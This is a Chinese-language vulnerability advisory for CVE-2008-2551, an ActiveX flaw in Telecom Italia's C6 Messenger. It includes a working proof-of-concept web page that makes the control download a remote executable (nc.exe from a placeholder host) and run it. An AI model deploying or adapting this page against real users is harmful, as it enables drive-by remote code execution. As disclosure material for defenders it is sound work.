C6 Messenger下载Url DownloaderActiveX控件远程代码执行漏洞
发布日期:2008-06-03
更新日期:2008-06-04
受影响系统:Telecom Italia C6 Messenger
描述:
CVE(CAN) ID:
CVE-2008-2551
C6 Messenger是由意大利电信提供的即时聊天程序。
C6 Messenger所安装的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
用户可从
http://c6.community.alice.it/download/c6.html 下载并安装C6 Messenger。当使用IE访问这个URL的话,就会提示用户安装DownloaderActiveX控件(CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61)。该控件没有正确地验证对propDownloadUrl属性的输入参数,如果用户安装了控件后访问恶意网页的话,就会导致执行任意代码。
<*来源:SnoopyAssault (
ipsdix@gmail.com)
链接:
http://marc.info/?l=bugtraq&m=121252829106505&w=2
http://secunia.com/advisories/30512/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<HTML>
<BODY>
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressBackground" VALUE="#bccee8">
<PARAM NAME="propTextBackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="
http://yoursite.com/nc.exe"><!-- change to your \
favourite kit ! :) --> <PARAM NAME="propPostDownloadAction" VALUE="run"> <!-- lol \
--> <PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propBrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0">
</OBJECT>
</BODY>
</HTML>
建议:
厂商补丁:
Telecom Italia
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://c6.community.alice.it/download/c6.html浏览次数:2584
严重程度:0(网友投票)
